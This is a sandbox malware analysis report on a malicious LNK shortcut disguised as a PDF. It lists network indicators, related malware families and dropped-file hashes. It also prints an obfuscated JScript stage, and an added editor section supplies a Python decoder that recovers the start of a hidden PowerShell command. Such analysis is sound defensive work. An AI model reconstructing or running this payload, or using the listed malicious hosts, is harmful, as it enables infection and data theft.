180.163.242.102  360.net                             China          4812   CHINANET-SH-APChinaTelecomGroupCN                 false
103.235.47.188   www.wshifen.com                     Hong Kong      55967  BAIDUBeijingBaiduNetcomScienceandTechnologyCoLtd  false
104.21.83.229    cndef1.green-pathways.shop          United States  13335  CLOUDFLARENETUS                                   true
                                                                                              IP
                                                                                              127.0.0.1
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1576547
Start date and time: 2024-12-17 08:47:09 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 6m 16s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 13
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: Instruction_695-18112-002_Rev.PDF.lnk (2).d.lnk
Detection: MAL
Classification: mal100.troj.evad.winLNK@14/15@8/6
EGA Information: Failed
HCA Information:
• Successful, ratio: 96%
• Number of executed functions: 27
• Number of non-executed functions: 2
Cookbook Comments:
• Found application associated with file extension: .lnk
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
• Excluded IPs from analysis (whitelisted): 23.218.208.109, 13.107.246.63, 52.149.20.212
• Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, e16604.g.akamaiedge.net, ctldl.windowsupdate.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target mshta.exe, PID 5416 because there are no executed functions
• Execution Graph export aborted for target powershell.exe, PID 408 because it is empty
• Execution Graph export aborted for target powershell.exe, PID 6568 because it is empty
• Execution Graph export aborted for target powershell.exe, PID 984 because it is empty
• Not all processes were analyzed; the report is missing behavior information
• Report size getting too big, too many NtEnumerateKey calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time      Type             Description
02:48:06  API Interceptor  2x Sleep call for process: svchost.exe modified
02:48:07  API Interceptor  134x Sleep call for process: powershell.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
172.67.19.24 | rrats.exe | malicious | AsyncRAT | pastebin.com/raw/KKpnJShN
172.67.19.24 | sys_upd.ps1 | malicious | Unknown | pastebin.com/raw/sA04Mwk2
172.67.19.24 | cr_asm_menu..ps1 | malicious | Unknown | pastebin.com/raw/sA04Mwk2
172.67.19.24 | cr_asm2.ps1 | malicious | Unknown | pastebin.com/raw/sA04Mwk2
172.67.19.24 | cr_asm_phshop..ps1 | malicious | Unknown | pastebin.com/raw/sA04Mwk2
172.67.19.24 | VvPrGsGGWH.exe | malicious | AsyncRAT, XWorm | pastebin.com/raw/sA04Mwk2
172.67.19.24 | HQsitBLlOv.dll | malicious | Unknown | pastebin.com/raw/sA04Mwk2
172.67.19.24 | xK44OOt7vD.exe | malicious | Unknown | pastebin.com/raw/sA04Mwk2
172.67.19.24 | steamcodegenerator.exe | malicious | Unknown | pastebin.com/raw/sA04Mwk2
172.67.19.24 | cr_asm_hiddenz.ps1 | malicious | AsyncRAT, XWorm | pastebin.com/raw/sA04Mwk2
180.163.242.102 | Setup.exe | malicious | LummaC Stealer |
180.163.242.102 | b6FArHy7yA.exe | malicious | LummaC Stealer |
103.235.47.188 | VIP-#U4f1a#U5458#U7248.exe | malicious | BlackMoon | www.baidu.com/
103.235.47.188 | Iifpj4i2kC.exe | malicious | FormBook | www.zruypj169g.top/md02/?oHH8=VZUPDXU8mXkToFn&0PG4QdD=KBMih/6UmjMCLIvQj8A+JVJ0ZduXlvkac/jrKRN7UGcA2YCWIWeuvW479UURmW6VwJBRFqK2PA==
103.235.47.188 | 3.exe | malicious | BlackMoon, XRed | www.baidu.com/
103.235.47.188 | CZyOWoN2hiszA6d.exe | malicious | FormBook | www.vicmvm649n.top/v15n/?Yn=UsBn8mn1PUl4czyMQZxenuqc6dPBc+Q3khu6MN2NNQj7YA4ug5lWpId+R/K0fD87Hm6v&mv=Y4QppplhSjwxWBd
103.235.47.188 | f2.exe | malicious | BlackMoon | www.baidu.com/
103.235.47.188 | f1.exe | malicious | Unknown | www.baidu.com/
103.235.47.188 | SecuriteInfo.com.FileRepMalware.29184.31872.exe | malicious | Unknown | www.baidu.com/
103.235.47.188 | chAJcIK6ZO.exe | malicious | Unknown | www.baidu.com/
103.235.47.188 | LisectAVT_2403002A_489.exe | malicious | Unknown | www.baidu.com/
103.235.47.188 | d48c236503a4d2e54e23d9ebc9aa48e86300fd24955c871a7b8792656c47fb6a.exe | malicious | Bdaejec | www.baidu.com/
Match | Associated Sample Name / URL | Detection | Threat Name | Context
www.360.net | Setup.exe | malicious | LummaC Stealer | 180.163.242.102
www.360.net | b6FArHy7yA.exe | malicious | LummaC Stealer | 180.163.242.102
www.360.net | Full_Setup_v24.exe | malicious | LummaC Stealer | 180.163.246.86
www.wshifen.com | 2024-12-10#U67e5#U9605_uninst.exe | malicious | ValleyRAT | 103.235.47.188
www.wshifen.com | 2024-12-10#U67e5#U9605_uninst.exe | malicious | ValleyRAT | 103.235.47.188
www.wshifen.com | Setup.exe | malicious | LummaC Stealer | 103.235.47.188
www.wshifen.com | b6FArHy7yA.exe | malicious | LummaC Stealer | 103.235.47.188
www.wshifen.com | VIP-#U4f1a#U5458#U7248.exe | malicious | BlackMoon | 103.235.46.96
www.wshifen.com | 360safe.exe | malicious | Unknown | 103.235.47.188
www.wshifen.com | XiaobingOnekey.exe | malicious | Unknown | 103.235.46.96
www.wshifen.com | DNF#U604b#U62180224a.exe | malicious | Unknown | 103.235.46.96
www.wshifen.com | http://profdentalcare.com | malicious | Unknown | 103.235.46.96
www.wshifen.com | Iifpj4i2kC.exe | malicious | FormBook | 103.235.47.188
360.net | Setup.exe | malicious | LummaC Stealer | 180.163.242.102
360.net | b6FArHy7yA.exe | malicious | LummaC Stealer | 180.163.242.102
360.net | Full_Setup_v24.exe | malicious | LummaC Stealer | 180.163.246.86
360.net | wh2JzrnksH | malicious | Unknown | 180.163.246.86
360.net | MCYq2AqNU0.exe | malicious | Glupteba, LummaC Stealer, SmokeLoader, Stealc, Xmrig | 218.213.216.154
360.net | xqz8sQ4mZB.exe | malicious | Glupteba, SmokeLoader | 218.213.216.3
360.net | https://iop360.net/jsg2n | malicious | Unknown | 92.255.57.104
360.net | Drawing & Company Profile.exe | malicious | FormBook | 156.239.201.69
360.net | REQUIREMENT.exe | malicious | GuLoader FormBook | 156.239.224.4
cndef1.green-pathways.shop | ref095vq842r70_classement_atout_france.pdf.lnk.d.lnk | malicious | RedLine, SectopRAT | 188.114.97.6
cndef1.green-pathways.shop | Instruction_695-18112-002_Rev.PDF.lnk.d.lnk | malicious | Unknown | 104.21.83.229
Match | Associated Sample Name / URL | Detection | Threat Name | Context
CLOUDFLARENETUS | ref095vq842r70_classement_atout_france.pdf.lnk.d.lnk | malicious | RedLine, SectopRAT | 188.114.97.6
CLOUDFLARENETUS | payload_1.hta | malicious | RedLine | 104.21.87.65
CLOUDFLARENETUS | PAYMENT ADVICE TT07180016-24_pdf.exe | malicious | GuLoader, MassLogger RAT | 104.21.67.152
CLOUDFLARENETUS | bxAoaISZJQ.lnk | malicious | Unknown | 172.67.139.105
CLOUDFLARENETUS | ei0woJS3Dy.lnk | malicious | Unknown | 172.67.140.151
CLOUDFLARENETUS | tz1WicW6sG.lnk | malicious | Unknown | 188.114.96.6
CLOUDFLARENETUS | pre-stowage.PDF.scr.exe | malicious | Snake Keylogger, VIP Keylogger | 172.67.177.134
CLOUDFLARENETUS | HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe | malicious | Snake Keylogger, VIP Keylogger | 104.21.67.152
CLOUDFLARENETUS | https://quarantine-emails13122024bcpe038qua8303rantine0832411.s3.eu-central-3.ionoscloud.com/message.html#anneke.hanekom@mmiholdings.co.za | malicious | HTMLPhisher | 104.18.11.207
CLOUDFLARENETUS | Assinar_PDF_3476.lNK.lnk | malicious | Unknown | 104.21.32.1
CHINANET-SH-APChinaTelecomGroupCN | ldr.ps1 | malicious | GO Miner, Xmrig | 124.78.167.193
CHINANET-SH-APChinaTelecomGroupCN | 1.elf | malicious | Unknown | 218.82.146.246
CHINANET-SH-APChinaTelecomGroupCN | 236236236.elf | malicious | Unknown | 180.163.146.100
CHINANET-SH-APChinaTelecomGroupCN | arm4.elf | malicious | Mirai | 180.175.98.217
CHINANET-SH-APChinaTelecomGroupCN | mpsl.elf | malicious | Mirai, Moobot | 61.129.76.153
CHINANET-SH-APChinaTelecomGroupCN | mips.elf | malicious | Mirai, Moobot | 222.67.51.212
CHINANET-SH-APChinaTelecomGroupCN | https://stoss3.libooc.com | malicious | Unknown | 180.163.146.100
CHINANET-SH-APChinaTelecomGroupCN | arm5.elf | malicious | Unknown | 101.83.13.176
CHINANET-SH-APChinaTelecomGroupCN | arm.elf | malicious | Unknown | 114.84.211.156
CHINANET-SH-APChinaTelecomGroupCN | ppc.elf | malicious | Unknown | 101.225.14.229
Match | Associated Sample Name / URL | Detection | Threat Name | Context
3b5074b1b5d032e5620f69f9f700ff0e | sEOELQpFOB.lnk | malicious | RedLine | 104.21.66.20, 103.235.47.188, 172.67.19.24, 180.163.242.102
3b5074b1b5d032e5620f69f9f700ff0e | ref095vq842r70_classement_atout_france.pdf.lnk.d.lnk | malicious | RedLine, SectopRAT | 104.21.66.20, 103.235.47.188, 172.67.19.24, 180.163.242.102
3b5074b1b5d032e5620f69f9f700ff0e | payload_1.hta | malicious | RedLine | 104.21.66.20, 103.235.47.188, 172.67.19.24, 180.163.242.102
3b5074b1b5d032e5620f69f9f700ff0e | PAYMENT ADVICE TT07180016-24_pdf.exe | malicious | GuLoader, MassLogger RAT | 104.21.66.20, 103.235.47.188, 172.67.19.24, 180.163.242.102
3b5074b1b5d032e5620f69f9f700ff0e | ei0woJS3Dy.lnk | malicious | Unknown | 104.21.66.20, 103.235.47.188, 172.67.19.24, 180.163.242.102
3b5074b1b5d032e5620f69f9f700ff0e | tz1WicW6sG.lnk | malicious | Unknown | 104.21.66.20, 103.235.47.188, 172.67.19.24, 180.163.242.102
3b5074b1b5d032e5620f69f9f700ff0e | pre-stowage.PDF.scr.exe | malicious | Snake Keylogger, VIP Keylogger | 104.21.66.20, 103.235.47.188, 172.67.19.24, 180.163.242.102
3b5074b1b5d032e5620f69f9f700ff0e | HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe | malicious | Snake Keylogger, VIP Keylogger | 104.21.66.20, 103.235.47.188, 172.67.19.24, 180.163.242.102
3b5074b1b5d032e5620f69f9f700ff0e | https://quarantine-emails13122024bcpe038qua8303rantine0832411.s3.eu-central-3.ionoscloud.com/message.html#anneke.hanekom@mmiholdings.co.za | malicious | HTMLPhisher | 104.21.66.20, 103.235.47.188, 172.67.19.24, 180.163.242.102
3b5074b1b5d032e5620f69f9f700ff0e | Sublabially.vbs | malicious | Remcos, GuLoader | 104.21.66.20, 103.235.47.188, 172.67.19.24, 180.163.242.102
37f463bf4616ecd445d4a1937da06e19 | sEOELQpFOB.lnk | malicious | RedLine | 104.21.83.229
37f463bf4616ecd445d4a1937da06e19 | ref095vq842r70_classement_atout_france.pdf.lnk.d.lnk | malicious | RedLine, SectopRAT | 104.21.83.229
37f463bf4616ecd445d4a1937da06e19 | PAYMENT ADVICE TT07180016-24_pdf.exe | malicious | GuLoader, MassLogger RAT | 104.21.83.229
37f463bf4616ecd445d4a1937da06e19 | bxAoaISZJQ.lnk | malicious | Unknown | 104.21.83.229
37f463bf4616ecd445d4a1937da06e19 | ei0woJS3Dy.lnk | malicious | Unknown | 104.21.83.229
37f463bf4616ecd445d4a1937da06e19 | tz1WicW6sG.lnk | malicious | Unknown | 104.21.83.229
37f463bf4616ecd445d4a1937da06e19 | Assinar_PDF_3476.lNK.lnk | malicious | Unknown | 104.21.83.229
37f463bf4616ecd445d4a1937da06e19 | Sublabially.vbs | malicious | Remcos, GuLoader | 104.21.83.229
37f463bf4616ecd445d4a1937da06e19 | 69633f.msi | malicious | Vidar | 104.21.83.229
37f463bf4616ecd445d4a1937da06e19 | DG55Gu1yGM.exe | malicious | LummaC | 104.21.83.229
                                                                                                  No context
Process: C:\Windows\System32\svchost.exe
File Type: data
Category: dropped
Size (bytes): 1310720
Entropy (8bit): 0.8307166015914568
Encrypted: false
SSDEEP: 1536:gJhkM9gB0CnCm0CQ0CESJPB9JbJQfvcso0l1T4MfzzTi1FjIIXYvjbglQdmHDugu:gJjJGtpTq2yv1AuNZRY3diu8iBVqFg
MD5: DA3800D8CA02630B475AABADE5F55BD9
SHA1: C1E3BD7360650A2EFD13B0499EF4C9BFA76F54C7
SHA-256: 5668A17CA4ED4D380148CB5DCBA26205888A33B28AA0513DEEC0BC41C55AAEB4
SHA-512: 3F15E297D5F20E18D43428DA9069F3A54A578C339ED23A498ECD37F5482A4DB9B54A115DCF3351F2448657E95AED93B1D670B05344DCA7F10B03C87FA75CB55D
Malicious: false
Process: C:\Windows\System32\svchost.exe
File Type: Extensible storage engine DataBase, version 0x620, checksum 0x525057bf, page size 16384, DirtyShutdown, Windows version 10.0
Category: dropped
Size (bytes): 1310720
Entropy (8bit): 0.6585751365014096
Encrypted: false
SSDEEP: 1536:RSB2ESB2SSjlK/rv5rO1T1B0CZSJRYkr3g16P92UPkLk+kAwI/0uzn10M1Dn/di6:Raza9v5hYe92UOHDnAPZ4PZf9h/9h
MD5: A0EC74A5559828433D4F6B33427E38E6
SHA1: F892251E8B631D49D06393A1EA51A65C6BC72B84
SHA-256: D37DB82CE32CC5DA250C1D1C75908AB5BADE2C72D26FA70077BC9355E009CA0D
SHA-512: 77F7D7CC0BC0DF3F57FCE7AEE19286CD9E65ECB9358E0E32D62B061701BB14882442BF52505D63C394C1A239A79D040D00D72B5A1EA9149014EF7FA6B7AF491C
Malicious: false
Process: C:\Windows\System32\svchost.exe
File Type: data
Category: dropped
Size (bytes): 16384
Entropy (8bit): 0.08128451222520645
Encrypted: false
SSDEEP: 3:/fyYeUI03lNkGuAJkhvekl1PhltAllrekGltll/SPj:XyzI3srxlDltAJe3l
MD5: 56755CEBD0FFD346A0285CE4C486988C
SHA1: D5D383D556BA0977842FB6C7A5422C659D512527
SHA-256: 386D29BC1A03947094365BBAE77C55576D2134C5D08D47D506E8F3E2419A3C02
SHA-512: 9D5B1E06D776C825E3F1576550A367132486B829D8B377E74EB7C7CD3A08FC091689C7EFEA2FB90F2108BB2687965BD8AD319452E48DA7355D0ADBF7FC362521
Malicious: false
Process: C:\Windows\System32\mshta.exe
File Type: ASCII text, with very long lines (65536), with no line terminators
Category: dropped
Size (bytes): 397568
Entropy (8bit): 3.1457715733720137
Encrypted: false
SSDEEP: 3072:wZZBLQzvXzIak9YxGMFpGuGXtJS5SJP86uUCLNhvusObcw5+7W+k6:wJZm7GJPqpl9h
MD5: 581AC1AC39C1DB67986949DD1A88E596
SHA1: 17528BCE578B4A1404CFAEA5FBBF5445C0D138A1
SHA-256: 850FE5FCA552CD8EEC40AFD88B540C25395D892A2D21553AF1BF0BBB5B019CF8
SHA-512: 325D6D7F0BB30E3B692206C4C300E74807B54D55AB8F31C7D47FD37D35307761E03BA45112D48994BE2F68FB175EA379F123B11E511908660B0CBA571649E88A
Malicious: false
                                                                                                  Preview:66e75W6ea63O74Z69t6fI6eT20T6bd47E62c42f4bn28I58i4bq64w65p4dB48g29H7ba76F61Z72k20I6fX53y77c50N64V4fO3dY20R27t27D3bz66b6fE72V20T28A76O61T72i20y41r79E64Z6eJ54q72z20Y3dM20X30w3bV41o79o64l6ek54V72q20P3ci20N58G4bV64P65f4dq48V2el6cg65M6eG67M74l68r3bm20R41T79Y64T6eX54W72q2bM2bu29x7bh76K61m72T20k7ay6eJ70y61l74U20s3dV20o53u74S72V69O6es67z2eQ66k72k6fx6dC43U68Q61w72X43s6fM64X65t28a58R4bx64f65i4dS48v5bO41x79N64z6eX54u72v5de20e2dA20C31H36x38M29d3bN6fw53N77k50y64U4fC20l3dF20Y6fw53y77u50X64w4fm20m2bv20w7al6eT70W61k74Z7dH72Y65m74R75X72q6eE20Z6fh53w77E50B64S4fx7dT3bb76M61L72I20b6fb53w77A50H64h4fO20P3dM20B6ba47K62r42M4bo28d5bZ32h38k30O2cP32T37W39Q2cx32S38v37U2cp32c36V39Z2cH32N38J32y2cL32X38e33k2cJ32a37s32Y2cG32m36N39o2ce32U37t36t2cb32w37s36H2cE32f31D34p2cl32t36a39j2cf32B38C38d2cC32p36R39B2cD32A30F30p2cb32x31J33L2cE32G38q37U2ci32c30y30K2cV32B31t37f2cU32p30y30P2cz32I31t33F2cj32k36m39o2cC32r38q30a2cr32D30g30G2cW32r35k33f2cD32G37A38D2cD32s38I32B2cw32m36h39N2cC32q38p33S2cE32D38c34U2cU32C38S32r2cm32X37T33S2cV3
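The 397568-byte file above, retrieved by mshta.exe, is the next stage, and the report's preview is enough to read its encoding: each byte is written as a hex pair followed by one filler letter, and the text that emerges is JScript that rebuilds a string by subtracting 168 from every element of an integer array. The decoder below is an added example (editor code, not part of the Joe Sandbox report and not the sample's own code). PREVIEW is the report's truncated preview copied verbatim; the "hex pair plus one filler" layout and the charcode-minus-constant scheme are read off that preview and assumed, not confirmed, to hold for the whole file, and the decoded command stops where the preview stops.

```python
"""Two-stage decoder for the mshta-retrieved script in this report.

Added example by the editor, not code from the Joe Sandbox report or from
the sample. PREVIEW is the report's own (truncated) preview of the 397568-byte
file dropped by mshta.exe. The layout read off that preview, one hex pair
followed by one filler character, then JScript that subtracts a constant from
an integer array, is assumed to hold for the whole file; the preview alone
cannot confirm that.
"""
import re

# Copied from the report's "Preview" field (truncated there, truncated here).
PREVIEW = (
    "66e75W6ea63O74Z69t6fI6eT20T6bd47E62c42f4bn28I58i4bq64w65p4dB48g29H7ba76F61Z72k20I6fX53y77c50N64V4fO3dY20R27t27D3bz"
    "66b6fE72V20T28A76O61T72i20y41r79E64Z6eJ54q72z20Y3dM20X30w3bV41o79o64l6ek54V72q20P3ci20N58G4bV64P65f4dq48V2el6cg65M6eG67M74l68r3bm20R"
    "41T79Y64T6eX54W72q2bM2bu29x7bh76K61m72T20k7ay6eJ70y61l74U20s3dV20o53u74S72V69O6es67z2eQ66k72k6fx6dC43U68Q61w72X43s6fM64X65t"
    "28a58R4bx64f65i4dS48v5bO41x79N64z6eX54u72v5de20e2dA20C31H36x38M29d3bN6fw53N77k50y64U4fC20l3dF20Y6fw53y77u50X64w4fm20m2bv20w7al6eT70W61k74Z7dH"
    "72Y65m74R75X72q6eE20Z6fh53w77E50B64S4fx7dT3bb76M61L72I20b6fb53w77A50H64h4fO20P3dM20B6ba47K62r42M4bo28d5bZ"
    "32h38k30O2cP32T37W39Q2cx32S38v37U2cp32c36V39Z2cH32N38J32y2cL32X38e33k2cJ32a37s32Y2cG32m36N39o2ce32U37t36t2cb32w37s36H2cE32f31D34p2cl"
    "32t36a39j2cf32B38C38d2cC32p36R39B2cD32A30F30p2cb32x31J33L2cE32G38q37U2ci32c30y30K2cV32B31t37f2cU32p30y30P2cz32I31t33F2cj"
    "32k36m39o2cC32r38q30a2cr32D30g30G2cW32r35k33f2cD32G37A38D2cD32s38I32B2cw32m36h39N2cC32q38p33S2cE32D38c34U2cU32C38S32r2cm32X37T33S2cV3"
)

HEX_PAIR = re.compile(r"[0-9A-Fa-f]{2}")


def strip_filler_hex(blob: str) -> str:
    """Stage 1: keep the first two characters of every three-character group.

    The filler may itself be a hex digit ('e', 'd' and 'c' all occur in
    PREVIEW), so selecting by position is the only correct rule; filtering
    out non-hex characters would corrupt the output. A trailing incomplete
    group is dropped, which is what a truncated preview produces.
    """
    out = bytearray()
    for i in range(0, len(blob) - 1, 3):
        pair = blob[i:i + 2]
        if not HEX_PAIR.fullmatch(pair):
            raise ValueError(f"non-hex pair {pair!r} at offset {i}: layout assumption broken")
        out.append(int(pair, 16))
    return out.decode("ascii")


# Matches the decoder loop body, e.g. String.fromCharCode(XKdeMH[AydnTr] - 168)
OFFSET_RE = re.compile(r"fromCharCode\(\s*\w+\[\w+\]\s*-\s*(\d+)\s*\)")
# First bracketed run of integers: the array handed to that decoder.
ARRAY_RE = re.compile(r"\[\s*(\d+(?:\s*,\s*\d+)*)")


def charcode_offset(js: str) -> int:
    m = OFFSET_RE.search(js)
    if not m:
        raise ValueError("no String.fromCharCode(x[i] - N) decoder found")
    return int(m.group(1))


def decode_charcode_array(js: str) -> str:
    """Stage 2: rebuild the string the JScript builds, without executing it."""
    offset = charcode_offset(js)
    m = ARRAY_RE.search(js)
    if not m:
        raise ValueError("no integer array found")
    codes = [int(n) for n in re.split(r"\s*,\s*", m.group(1))]
    return "".join(chr(c - offset) for c in codes)


def decode_preview(blob: str = PREVIEW) -> dict:
    js = strip_filler_hex(blob)
    return {
        "stage1_prefix": js[:40],
        "offset": charcode_offset(js),
        "command": decode_charcode_array(js),
    }


if __name__ == "__main__":
    for key, value in decode_preview().items():
        print(f"{key}: {value!r}")
```

On the preview as given, stage 1 yields `function kGbBK(XKdeMH){...}` and stage 2 yields a PowerShell command line that begins `powershell.exe -w 1 -ep Unrestri` and is cut off there because the preview is; the full 397568-byte file is needed for the rest, and the same two functions apply to it if the layout holds throughout.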
                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):9434
                                                                                                  Entropy (8bit):4.928515784730612
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:192:Lxoe5qpOZxoe54ib4ZVsm5emdrgkjDt4iWN3yBGHVQ9smzdcU6Cj9dcU6CG9smAH:srib4ZIkjh4iUxsT6Ypib47
                                                                                                  MD5:D3594118838EF8580975DDA877E44DEB
                                                                                                  SHA1:0ACABEA9B50CA74E6EBAE326251253BAF2E53371
                                                                                                  SHA-256:456A877AFDD786310F7DAF74CCBC7FB6B0A0D14ABD37E3D6DE9D8277FFAC7DDE
                                                                                                  SHA-512:103EA89FA5AC7E661417BBFE049415EF7FA6A09C461337C174DF02925D6A691994FE91B148B28D6A712604BDBC4D1DB5FEED8F879731B36326725AA9714AC53C
                                                                                                  Malicious:false
                                                                                                  Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):64
                                                                                                  Entropy (8bit):0.34726597513537405
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:Nlll:Nll
                                                                                                  MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                                  SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                                  SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                                  SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                                  Malicious:false
                                                                                                  Preview:@...e...........................................................
                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):60
                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                  Malicious:false
                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):60
                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                  Malicious:false
                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):60
                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                  Malicious:false
                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):60
                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                  Malicious:false
                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):60
                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                  Malicious:false
                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):60
                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
